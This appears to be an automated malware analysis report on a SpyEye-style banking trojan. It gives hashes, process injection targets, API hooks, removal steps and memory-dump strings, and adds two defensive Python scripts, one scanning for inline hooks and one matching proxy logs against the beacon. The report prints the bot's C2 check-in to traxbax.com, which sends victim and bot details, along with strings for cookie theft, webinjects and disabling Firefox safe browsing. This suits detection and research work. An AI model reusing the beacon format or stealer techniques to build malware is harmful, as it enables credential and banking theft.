Detections: HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.32521 (B) (Emsisoft), Gen:Variant.Kazy.32521 (AdAware), Trojan.Win32.Spyeye.FD, SpyEye.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 314df257f926d8d7d131544563571d92
SHA1: dcf023a17c07e2b0c1090ae3bd4f6fc457a8a138
SHA256: 86ca56311fc21d93dd677c5c377901dea39c68481aadfdd1e932ae410d4961f0
SSDeep: 3072:exUtCjHYfvmnER0GtD/QFhRh6apCPSMd7:exUtqSvmnER0GJGRsa bd7
Size: 123392 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 2029-04-02 18:36:32 (the PE compile timestamp lies in the future relative to the 17 Aug 2015 analysis recorded in the traffic below, so it has been forged or randomised and must not be used to date the build)
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
trivax1.Bin.exe:432
The Trojan injects its code into the following process(es):
vmacthlp.exe:892
wmiprvse.exe:228
Explorer.EXE:532
winlogon.exe:680
lsass.exe:736
svchost.exe:904
svchost.exe:988
svchost.exe:1084
svchost.exe:1128
svchost.exe:1180
spoolsv.exe:1424
jqs.exe:1640
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process trivax1.Bin.exe:432 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\trivax1.Bin\config.bin (3 bytes)
Registry activity
The process trivax1.Bin.exe:432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 7E 55 83 27 63 E9 27 B7 5B DF CA DA AD 27 E9"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in WININET.dll:
HttpSendRequestW
InternetReadFileExA
InternetWriteFile
InternetQueryDataAvailable
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
HttpAddRequestHeadersA
HttpOpenRequestA
InternetQueryOptionA
The Trojan installs the following user-mode hooks in USER32.dll:
TranslateMessage
The Trojan installs the following user-mode hooks in CRYPT32.dll:
PFXImportCertStore
The Trojan installs the following user-mode hooks in ADVAPI32.dll:
CryptEncrypt
The Trojan installs the following user-mode hooks in WS2_32.dll:
send
The Trojan installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtVdmControl
ZwSetInformationFile
NtResumeThread
NtQueryDirectoryFile
NtEnumerateValueKey
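The hook list above is what an inline-hook scanner reports when it compares each export's prologue in the injected process with the same bytes on disk: the first instruction has been overwritten with a jump into the injected code, which then calls the original function through a trampoline. The Python below is an added example written for this page, not code from the report or from Lavasoft. It decodes the three jump patterns inline hookers usually write (`jmp rel32`, `push imm32; ret`, `mov eax, imm32; jmp eax`), resolves the target, and flags any export whose target leaves the module image. The wininet.dll base and size, the three export addresses and the byte snapshots are constructed for the demonstration; the 0x0BAD0000 region of 0x45000 bytes is taken from the dump name `wmiprvse.exe_228_rwx_0BAD0000_00045000` later in this report.

```python
import struct

# Constructed values for the demonstration (assumptions, not from the report):
# a wininet.dll image range and three export addresses inside it.
WININET_RANGE = (0x771B0000, 0x771B0000 + 0x000A4000)
# The injected RWX region is taken from the dump name
# wmiprvse.exe_228_rwx_0BAD0000_00045000 in this report.
INJECTED_REGIONS = {"rwx_0BAD0000_00045000": (0x0BAD0000, 0x0BAD0000 + 0x00045000)}

# Hot-patchable prologue of XP SP2+ system DLL exports
# (mov edi,edi / push ebp / mov ebp,esp) followed by sub esp,0x10.
CLEAN_PROLOGUE = bytes.fromhex("8BFF558BEC83EC10")


def decode_transfer(va, code):
    """Decode an unconditional control transfer at the start of `code` located at `va`.

    Returns (kind, target) for the patterns inline hookers commonly write, or None
    when the first instruction is not one of them. An indirect `jmp [mem]` cannot be
    resolved without reading the pointer, so it is deliberately not decoded here.
    """
    if len(code) >= 5 and code[0] == 0xE9:                                # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return "jmp rel32", (va + 5 + rel) & 0xFFFFFFFF
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:            # push imm32 ; ret
        return "push/ret", struct.unpack_from("<I", code, 1)[0]
    if len(code) >= 7 and code[0] == 0xB8 and code[5:7] == b"\xFF\xE0":   # mov eax,imm32 ; jmp eax
        return "mov eax/jmp eax", struct.unpack_from("<I", code, 1)[0]
    return None


def classify_export(name, va, mem_bytes, disk_bytes, module_range, regions):
    """Compare an export's in-memory prologue with the on-disk one and say
    whether it is hooked and which memory region the hook leads into."""
    if mem_bytes == disk_bytes:
        return {"export": name, "hooked": False, "target": None, "reason": "prologue matches disk"}
    transfer = decode_transfer(va, mem_bytes)
    if transfer is None:
        return {"export": name, "hooked": True, "target": None,
                "reason": "prologue modified but no decodable transfer"}
    kind, target = transfer
    lo, hi = module_range
    if lo <= target < hi:
        # A relocation or vendor hot-patch keeps control inside the image; not a hook.
        return {"export": name, "hooked": False, "target": target,
                "reason": f"{kind} stays inside module"}
    owner = next((n for n, (rlo, rhi) in regions.items() if rlo <= target < rhi), "unknown region")
    return {"export": name, "hooked": True, "target": target,
            "reason": f"{kind} to 0x{target:08X} in {owner}"}


def make_jmp_rel32(va, target):
    """Build the 5-byte `jmp rel32` that an inline hooker writes at `va`."""
    return b"\xE9" + struct.pack("<i", target - (va + 5))


def make_push_ret(target):
    """Build the 6-byte `push imm32 ; ret` variant of the same hook."""
    return b"\x68" + struct.pack("<I", target) + b"\xC3"


def sample_exports():
    """Constructed snapshot of three wininet exports: two hooked into the injected
    region, as the rootkit section of this report describes, and one untouched."""
    return [
        ("HttpSendRequestA", 0x771C0E60,
         make_jmp_rel32(0x771C0E60, 0x0BAD2F10) + CLEAN_PROLOGUE[5:], CLEAN_PROLOGUE),
        ("InternetReadFile", 0x771C3A20,
         make_push_ret(0x0BAD4100) + CLEAN_PROLOGUE[6:], CLEAN_PROLOGUE),
        ("InternetCloseHandle", 0x771B8F00, CLEAN_PROLOGUE, CLEAN_PROLOGUE),
    ]


def scan_module(exports=None, module_range=WININET_RANGE, regions=INJECTED_REGIONS):
    """Classify every export; returns one dict per export in input order."""
    if exports is None:
        exports = sample_exports()
    return [classify_export(n, va, mem, disk, module_range, regions)
            for n, va, mem, disk in exports]


if __name__ == "__main__":
    for r in scan_module():
        print(f'{r["export"]:<22} hooked={r["hooked"]!s:<5} {r["reason"]}')
```

On a live host the in-memory bytes come from reading the target process and the on-disk bytes from mapping the DLL and applying relocations to the same base; the comparison and target classification are the same as above. Note that a hook whose target lands inside another legitimately loaded module (a security product, for instance) will also be reported, so the region lookup is what separates this sample's injected RWX region from benign hooking.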
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
trivax1.Bin.exe:432
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\trivax1.Bin\config.bin (3 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 136 | 512 | 0.691211 | 05eb2ee9fd78c459bac150406c9d6734 |
.code | 8192 | 23271 | 23552 | 4.65819 | 887aa58c86d95fd81301b2bddd87dada |
.edata | 32768 | 475 | 512 | 3.56191 | 446363ab4fe7aac775737b25e3d2422b |
.rdata | 36864 | 64512 | 64512 | 5.5163 | 683e35bb0cf317380bbdf7f48b093449 |
.data | 102400 | 369920 | 30208 | 5.43777 | fe5e368ca2091335cca4ccd38c01c7a6 |
.rsrc | 475136 | 1080 | 1536 | 2.26764 | 473509a0bbead6cfe6c4fef23e26042c |
.reloc | 479232 | 1320 | 1536 | 4.2587 | 906be8b7abf216c864f891a4debf0db7 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
At analysis time (17 Aug 2015, per the Date headers in the captured traffic) traxbax.com resolved to an Amazon ELB (52.1.21.126) that answered every gate.php check-in with a 302 to a HugeDomains parking page, so the C2 domain had lapsed and the bot received no configuration or commands. The capture below documents the beacon format only, not a live C2 exchange.
URLs
URL | IP |
---|---|
hxxp://hdredirect-lb-399551664.us-east-1.elb.amazonaws.com/user/gate.php?guid=5.1.2600!XP7!A8A67A25&ver=10310&ie=6.0.2900.5512&os=5.1.2600&ut=Admin&ccrc=9EC01352&md5=314df257f926d8d7d131544563571d92&plg=customconnector&stat=online | |
hxxp://www.hugedomains.com/domain_profile.cfm?d=traxbax&e=com | 216.38.220.22 |
hxxp://traxbax.com/user/gate.php?guid=5.1.2600!XP7!A8A67A25&ver=10310&ie=6.0.2900.5512&os=5.1.2600&ut=Admin&ccrc=9EC01352&md5=314df257f926d8d7d131544563571d92&plg=customconnector&stat=online | 52.1.21.126 |
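The gate.php requests above are the bot's check-in. The query string carries the bot's own identity (`guid`, `ver`, and the `md5` of its executable, which matches the sample's MD5 in the Summary), the victim's OS build and IE version, the account type, and the loaded plugin name, exactly as the format string `guid=%s&ver=%u&ie=%s&os=%u.%u.%u&ut=%s&ccrc=X&md5=%s&plg=%s` recovered from the Explorer.EXE dump later on this page lays it out. The Python below is an added example for this page, not code from the report or from Lavasoft: it runs over a few constructed proxy-log lines (the first reuses the gate.php URL captured here), flags requests that match this parameter layout, and pulls the fields out as indicators. The log-line format, the client addresses and the reading of the middle `guid` field as the victim's host name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the gate.php check-in carries, per the format string in this report's dumps
# (stat=online is appended separately by "%s?%s&stat=online").
GATE_KEYS = {"guid", "ver", "ie", "os", "ut", "ccrc", "md5", "plg"}
# guid looks like "<os build>!<host name>!<8 hex digits>"; the host-name reading is an assumption.
GUID_RE = re.compile(r"^(\d+\.\d+\.\d+)!([^!]+)!([0-9A-Fa-f]{8})$")
MD5_RE = re.compile(r"^[0-9a-f]{32}$")

# Constructed proxy-log format (assumption): client, method, URL, quoted User-Agent.
LOG_RE = re.compile(r'^(\S+)\s+(\S+)\s+(\S+)\s+"([^"]*)"\s*$')

# Constructed sample log. Line 1 reuses the gate.php request captured in this report;
# lines 2 and 3 are decoys that share the User-Agent or the path but not the layout.
SAMPLE_LOG = """\
10.0.0.7 GET http://traxbax.com/user/gate.php?guid=5.1.2600!XP7!A8A67A25&ver=10310&ie=6.0.2900.5512&os=5.1.2600&ut=Admin&ccrc=9EC01352&md5=314df257f926d8d7d131544563571d92&plg=customconnector&stat=online "Microsoft Internet Explorer"
10.0.0.7 GET http://www.hugedomains.com/domain_profile.cfm?d=traxbax&e=com "Microsoft Internet Explorer"
10.0.0.9 GET http://intranet.example/user/gate.php?id=42&stat=online "Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0"
"""


def match_gate_request(url, user_agent):
    """Return extracted indicators if `url` looks like this bot's gate.php check-in, else None."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/gate.php"):
        return None
    query = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    if not GATE_KEYS.issubset(query):
        return None
    guid = GUID_RE.match(query["guid"])
    if guid is None or not MD5_RE.match(query["md5"].lower()):
        return None
    os_build, host, bot_id = guid.groups()
    return {
        "c2_host": parts.hostname,
        "os_build": os_build,
        "victim_host": host,
        "bot_id": bot_id.upper(),
        "bot_version": query["ver"],
        "bot_md5": query["md5"].lower(),
        "plugin": query["plg"],
        "user_type": query["ut"],
        # The sample sends a bare, non-Mozilla User-Agent; useful as a secondary pivot.
        "odd_user_agent": not user_agent.startswith("Mozilla/"),
    }


def analyse_log(text=SAMPLE_LOG):
    """Scan proxy-log lines and return one hit per check-in that matches the layout."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, url, ua = m.groups()
        ioc = match_gate_request(url, ua)
        if ioc:
            ioc["client"] = client
            hits.append(ioc)
    return hits


if __name__ == "__main__":
    for hit in analyse_log():
        print(hit)
```

Matching on the full key set and the `guid` shape, rather than on the domain, is what keeps the check useful after the C2 domain changes; the `bot_md5` field doubles as a file hash to sweep endpoints for, and `victim_host` names the infected machine without needing to resolve the client address.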
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /user/gate.php?guid=5.1.2600!XP7!A8A67A25&ver=10310&ie=6.0.2900.5512&os=5.1.2600&ut=Admin&ccrc=9EC01352&md5=314df257f926d8d7d131544563571d92&plg=customconnector&stat=online HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: traxbax.com
Cache-Control: no-cache
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Aug 2015 23:21:04 GMT
Location: hXXp://VVV.hugedomains.com/domain_profile.cfm?d=traxbax&e=com
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Content-Length: 182
Connection: keep-alive
<html><head><title>Object moved</title></head><body>..<h2>Object moved to <a href="hXXp://VVV.hugedomains.com/domain_profile.cfm?d=traxbax&e=com">here</a>.</h2>..</body></html>..HTTP/1.1 302 Found..Cache-Control: private..Content-Type: text/html; charset=utf-8..Date: Mon, 17 Aug 2015 23:21:04 GMT..Location: hXXp://VVV.hugedomains.com/domain_profile.cfm?d=traxbax&e=com..Server: Microsoft-IIS/8.0..X-Powered-By: ASP.NET..Content-Length: 182..Connection: keep-alive..<html><head><title>Object moved</title></head><body>..<h2>Object moved to <a href="hXXp://VVV.hugedomains.com/domain_profile.cfm?d=traxbax&e=com">here</a>.</h2>..</body></html>......
GET /user/gate.php?guid=5.1.2600!XP7!A8A67A25&ver=10310&ie=6.0.2900.5512&os=5.1.2600&ut=Admin&ccrc=9EC01352&md5=314df257f926d8d7d131544563571d92&plg=customconnector&stat=online HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: traxbax.com
Cache-Control: no-cache
HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Aug 2015 23:21:33 GMT
Location: hXXp://VVV.hugedomains.com/domain_profile.cfm?d=traxbax&e=com
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Content-Length: 182
Connection: keep-alive
<html><head><title>Object moved</title></head><body>..<h2>Object moved to <a href="hXXp://VVV.hugedomains.com/domain_profile.cfm?d=traxbax&e=com">here</a>.</h2>..</body></html>..HTTP/1.1 302 Found..Cache-Control: private..Content-Type: text/html; charset=utf-8..Date: Mon, 17 Aug 2015 23:21:33 GMT..Location: hXXp://VVV.hugedomains.com/domain_profile.cfm?d=traxbax&e=com..Server: Microsoft-IIS/8.0..X-Powered-By: ASP.NET..Content-Length: 182..Connection: keep-alive..<html><head><title>Object moved</title></head><body>..<h2>Object moved to <a href="hXXp://VVV.hugedomains.com/domain_profile.cfm?d=traxbax&e=com">here</a>.</h2>..</body></html>....
GET /domain_profile.cfm?d=traxbax&e=com HTTP/1.1
User-Agent: Microsoft Internet Explorer
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.hugedomains.com
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Server: Microsoft-IIS/8.5
Set-Cookie: BTP=1; expires=Tue, 16-Aug-16 23:21:05 GMT; domain=hugedomains.com; path=/
Set-Cookie: CFID=193589; expires=Wed, 14-Aug-24 23:21:05 GMT; path=/; HttpOnly
Set-Cookie: CFTOKEN=60FA010B-CCEC-4208-BB81AB435E0B3AD2; expires=Wed, 14-Aug-24 23:21:05 GMT; path=/; HttpOnly
Set-Cookie: SHOPPINGCART=; expires=Wed, 16-Sep-15 23:21:05 GMT; path=/
Set-Cookie: REFLOC=; expires=Tue, 16-Aug-16 23:21:05 GMT; path=/
Set-Cookie: HD=862BCC9681034F64B8B97B3357033E8C014; expires=Tue, 16-Aug-16 23:21:05 GMT; path=/
Set-Cookie: FWO=vQIF2KwBCfaKGgX1oBAW6PgJWK74QEeu8VhbqbVEFuW9Bkq5+0Vbq+RFUrP4Qkqv/k9Yr/NFX7m0CVKo+zcp3fBDUq/5Rl7Y/0EopotMXdz6Rl+p+UZZ2/E2Wq/9; expires=Tue, 16-Aug-16 23:21:05 GMT; path=/
Set-Cookie: PV=+Aka/64QPPesAhk=; expires=Tue, 16-Aug-16 23:21:05 GMT; path=/
Set-Cookie: DE3OOK=bm8k7EthKsVCanSUDig6xkh+OcdJaSrPVXp0iEtvOtpjYSTPTmABx1MzHdxGdivPfyt760RhJIhOfQvBUzN5iE59C8FTTDvBUH0s3G5KdJ4BRyjDa2862ho0YA==; expires=Tue, 16-Aug-16 23:21:05 GMT; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 17 Aug 2015 23:21:13 GMT
Content-Length: 11342
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="hXXp://VVV.w3.org/1999/xhtml"> <head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>HugeDomains.com - TraxbaX.com is for sale (Traxba X)</title> <link rel="stylesheet" href="hXXp://static.HugeDomains.com/css/common.css" /> <link rel="stylesheet" href="hXXp://static.HugeDomains.com/css/v3.css" /> <link rel="stylesheet" href="hXXp://static.HugeDomains.com/css/pages_v3b.css" /> <link rel="stylesheet" href="hXXp://static.HugeDomains.com/css/styles_hd.css" /> <script type="text/javascript" src="hXXp://static.HugeDomains.com/js/common.js"></script> <script type="text/javascript" src="http://static.HugeDomains.com/js/common_v3.js"></script> <script type="text/javascript" src="hXXp://static.HugeDomains.com/js/jquery-1.5.1.min.js"></script> <script language="javascript"> function headerWindowLoad() { return true; } </script>..<script type="text/javascript">..var _gaq = _gaq || [];.._gaq.push(['_setAccount', 'UA-7117339-4']);.._gaq.push(['_trackPageview']);..(function() {..var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;..ga.src = ('https:' == document.location.protocol ? 'hXXps://ssl' : 'hXXp://www') '.google-analytics.com/ga.js';..var s = document.getElementsByTagName('script')[0]; s.parentNode.
<<< skipped >>>
GET /domain_profile.cfm?d=traxbax&e=com HTTP/1.1
User-Agent: Microsoft Internet Explorer
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.hugedomains.com
Cookie: BTP=1; CFID=193589; CFTOKEN=60FA010B-CCEC-4208-BB81AB435E0B3AD2; SHOPPINGCART=; REFLOC=; HD=862BCC9681034F64B8B97B3357033E8C014; FWO=vQIF2KwBCfaKGgX1oBAW6PgJWK74QEeu8VhbqbVEFuW9Bkq5+0Vbq+RFUrP4Qkqv/k9Yr/NFX7m0CVKo+zcp3fBDUq/5Rl7Y/0EopotMXdz6Rl+p+UZZ2/E2Wq/9; PV=+Aka/64QPPesAhk=; DE3OOK=bm8k7EthKsVCanSUDig6xkh+OcdJaSrPVXp0iEtvOtpjYSTPTmABx1MzHdxGdivPfyt760RhJIhOfQvBUzN5iE59C8FTTDvBUH0s3G5KdJ4BRyjDa2862ho0YA==
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Server: Microsoft-IIS/8.5
Set-Cookie: BTP=1; expires=Tue, 16-Aug-16 23:21:26 GMT; domain=hugedomains.com; path=/
Set-Cookie: FWO=vQIF2KwBCfaKGgX1oBAW6PgJWK74QEeu8VhbqbVEFuW9Bkq5+0Vbq+RFUrP4Qkqv/k9Yr/NHXLm0CVKo+zcp3fBDUq/5Rl7Y/0EopotMXdz6Rl+p+UZZ2/E2Wq/9; expires=Tue, 16-Aug-16 23:21:26 GMT; path=/
Set-Cookie: PV=+wka/64QPPesAhk=; expires=Tue, 16-Aug-16 23:21:26 GMT; path=/
Set-Cookie: SHOPPINGCART=; expires=Wed, 16-Sep-15 23:21:26 GMT; path=/
Set-Cookie: REFLOC=; expires=Tue, 16-Aug-16 23:21:26 GMT; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 17 Aug 2015 23:21:34 GMT
Content-Length: 11342
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="hXXp://VVV.w3.org/1999/xhtml"> <head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>HugeDomains.com - TraxbaX.com is for sale (Traxba X)</title> <link rel="stylesheet" href="hXXp://static.HugeDomains.com/css/common.css" /> <link rel="stylesheet" href="hXXp://static.HugeDomains.com/css/v3.css" /> <link rel="stylesheet" href="hXXp://static.HugeDomains.com/css/pages_v3b.css" /> <link rel="stylesheet" href="hXXp://static.HugeDomains.com/css/styles_hd.css" /> <script type="text/javascript" src="hXXp://static.HugeDomains.com/js/common.js"></script> <script type="text/javascript" src="http://static.HugeDomains.com/js/common_v3.js"></script> <script type="text/javascript" src="hXXp://static.HugeDomains.com/js/jquery-1.5.1.min.js"></script> <script language="javascript"> function headerWindowLoad() { return true; } </script>..<script type="text/javascript">..var _gaq = _gaq || [];.._gaq.push(['_setAccount', 'UA-7117339-4']);.._gaq.push(['_trackPageview']);..(function() {..var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;..ga.src = ('https:' == document.location.protocol ? 'hXXps://ssl' : 'hXXp://www') '.google-analytics.com/ga.js';..var s = document.getElementsByTagName('script')[0]; s.parentNode.
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
wmiprvse.exe_228_rwx_0BAD0000_00045000:
.text
.reloc
config.dat
explorer.exe
webinjects.txt
screenshots.txt
threadmetadata!nfo%d
XX
SOFTWARE\Microsoft Windows
u.u.u u:u:u.u
0xx
(%d bytes)
INTERNET_FLAG_PASSIVE
INTERNET_FLAG_IGNORE_CERT_CN_INVALID
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP
INTERNET_OPTION_SERVER_CERT_CHAIN_CONTEXT
INTERNET_OPTION_ENABLE_PASSPORT_AUTH
INTERNET_OPTION_EXEMPT_CONNECTION_LIMIT
INTERNET_OPTION_DISABLE_PASSPORT_AUTH
INTERNET_OPTION_CLIENT_CERT_CONTEXT
INTERNET_OPTION_HTTP_DECODING
INTERNET_OPTION_BYPASS_EDITED_ENTRY
INTERNET_OPTION_RESET_URLCACHE_SESSION
INTERNET_OPTION_HTTP_VERSION
INTERNET_OPTION_SECONDARY_CACHE_KEY
INTERNET_OPTION_SECURITY_SELECT_CLIENT_CERT
INTERNET_OPTION_PROXY_PASSWORD
INTERNET_OPTION_SECURITY_KEY_BITNESS
INTERNET_OPTION_SECURITY_CERTIFICATE
INTERNET_OPTION_URL
INTERNET_OPTION_SECURITY_CERTIFICATE_STRUCT
INTERNET_OPTION_PASSWORD
HTTP_QUERY_FLAG_COALESCE
HTTP_QUERY_FLAG_NUMBER
HTTP_QUERY_FLAG_SYSTEMTIME
HTTP_QUERY_FLAG_REQUEST_HEADERS
HTTP_QUERY_UNKNOWN
HTTP_QUERY_CUSTOM
HTTP_QUERY_PASSPORT_CONFIG
HTTP_QUERY_PASSPORT_URLS
HTTP_QUERY_AUTHENTICATION_INFO
HTTP_QUERY_PROXY_SUPPORT
HTTP_QUERY_ECHO_HEADERS_CRLF
HTTP_QUERY_ECHO_HEADERS
HTTP_QUERY_ECHO_REPLY
HTTP_QUERY_ECHO_REQUEST
HTTP_QUERY_UNLESS_MODIFIED_SINCE
HTTP_QUERY_PROXY_CONNECTION
HTTP_QUERY_EXPECT
HTTP_QUERY_WARNING
HTTP_QUERY_VIA
HTTP_QUERY_VARY
HTTP_QUERY_UPGRADE
HTTP_QUERY_TRANSFER_ENCODING
HTTP_QUERY_RANGE
HTTP_QUERY_PROXY_AUTHORIZATION
HTTP_QUERY_MAX_FORWARDS
HTTP_QUERY_IF_UNMODIFIED_SINCE
HTTP_QUERY_IF_RANGE
HTTP_QUERY_IF_NONE_MATCH
HTTP_QUERY_IF_MATCH
HTTP_QUERY_HOST
HTTP_QUERY_ETAG
HTTP_QUERY_CONTENT_RANGE
HTTP_QUERY_CONTENT_MD5
HTTP_QUERY_CONTENT_LOCATION
HTTP_QUERY_CONTENT_BASE
HTTP_QUERY_CACHE_CONTROL
HTTP_QUERY_AGE
HTTP_QUERY_CONTENT_DISPOSITION
HTTP_QUERY_REFRESH
HTTP_QUERY_REQUEST_METHOD
HTTP_QUERY_COOKIE
HTTP_QUERY_SET_COOKIE
HTTP_QUERY_ACCEPT_RANGES
HTTP_QUERY_PROXY_AUTHENTICATE
HTTP_QUERY_WWW_AUTHENTICATE
HTTP_QUERY_USER_AGENT
HTTP_QUERY_TITLE
HTTP_QUERY_SERVER
HTTP_QUERY_RETRY_AFTER
HTTP_QUERY_REFERER
HTTP_QUERY_ORIG_URI
HTTP_QUERY_LOCATION
HTTP_QUERY_IF_MODIFIED_SINCE
HTTP_QUERY_FROM
HTTP_QUERY_FORWARDED
HTTP_QUERY_CONTENT_ENCODING
HTTP_QUERY_AUTHORIZATION
HTTP_QUERY_ACCEPT_LANGUAGE
HTTP_QUERY_ACCEPT_ENCODING
HTTP_QUERY_ACCEPT_CHARSET
HTTP_QUERY_ACCEPT
HTTP_QUERY_CONNECTION
HTTP_QUERY_RAW_HEADERS_CRLF
HTTP_QUERY_RAW_HEADERS
HTTP_QUERY_STATUS_TEXT
HTTP_QUERY_STATUS_CODE
HTTP_QUERY_VERSION
HTTP_QUERY_PRAGMA
HTTP_QUERY_LINK
HTTP_QUERY_COST
HTTP_QUERY_DERIVED_FROM
HTTP_QUERY_URI
HTTP_QUERY_MESSAGE_ID
HTTP_QUERY_LAST_MODIFIED
HTTP_QUERY_EXPIRES
HTTP_QUERY_DATE
HTTP_QUERY_PUBLIC
HTTP_QUERY_ALLOW
HTTP_QUERY_CONTENT_LANGUAGE
HTTP_QUERY_CONTENT_LENGTH
HTTP_QUERY_CONTENT_DESCRIPTION
HTTP_QUERY_CONTENT_ID
HTTP_QUERY_CONTENT_TRANSFER_ENCODING
HTTP_QUERY_CONTENT_TYPE
HTTP_QUERY_MIME_VERSION
Content-Length: %u
HTTP/
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
\\.\pipe\globpluginsuninstallpipe
cookies-nontor.xml
cookies.txt
sessionstore.js
sessionstore.bak
cookies.sqlite-journal
cookies.sqlite
GdiplusShutdown
gdiplus.dll
\\.\pipe\processingpipe_
services.exe
csrss.exe
smss.exe
\\.\pipe\globpluginspipe
X X
user_pref("browser.safebrowsing.enabled", false);
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_entering_weak.show_once", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("privacy.clearOnShutdown.sessions", false);
/Mozilla/Firefox/profiles.ini
/Mozilla/Firefox/
nspr4.dll
seieapiXX
%s\Content.IE5\0
%s\Content.IE5\%s
\Content.IE5\*.*
set_url
PFXImportCertStore
user32.dll
%d.%d.%d
keys
http:
urlmask
cert
%s%s%s
[ERROR] : CreateProcess("%s", ..., "%s") fails : dwFileSize == 0xX; dwCrc32 == 0xX : dwErr == %d
[ERROR] : DumpPage("%s", "%s") fails : dwErr == %d
[ERROR] : Empty szLink? : dwErr == %d
[ERROR] : Empty report. Unknown error : dwErr == %d
[ERROR] : Thread is really sloppy : dwErr == %d
[ERROR] : Cannot create thread. 0o : dwErr == %d
%d-%d-%d
collectors.txt
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\%d
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
ProxyHttp1.1
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
EnableHttp1_1
HttpSendRequestA
HttpSendRequestW
hXXp://
hXXps://
HTTP/1.
.mpeg
.jpeg
%s&tid=%s&%s
TakeBotExeMd5Callback
TakeOriginal_HttpSendRequestW
TakeOriginal_HttpSendRequestA
TakeOriginal_HttpOpenRequestA
TakeOriginal_HttpAddRequestHeadersA
Callback_OnBeforeProcessUrl
HttpQueryInfoA
HttpAddRequestHeadersA
HttpOpenRequestA
wlcomm.exe
msmsgs.exe
msnmsgr.exe
PR_OpenTCPSocket
kernel32.dll
Crypt32.dll
Advapi32.dll
ws2_32.dll
wininet.dll
Ht.Ht!HHt
w SSh
SSSSh
t.VPW
%System%\WININET.dll
C:\trivax1.Bin\config.bin
%System%\ntdll.dll
%System%\USER32.dll
%System%\CRYPT32.dll
C:\trivax1.Bin\trivax1.Bin.exe
C:\trivax1.Bin\
trivax1.Bin.exe
config.bin
o0Iu6US.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
5.1.2600!XP7!A8A67A25
trivax1.Bin
Microsoft Windows
%System%\ADVAPI32.dll
%System%\WS2_32.dll
PFXExportCertStoreEx
CertCloseStore
CertAddCertificateContextToStore
CertOpenStore
CertGetCertificateContextProperty
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertNameToStrA
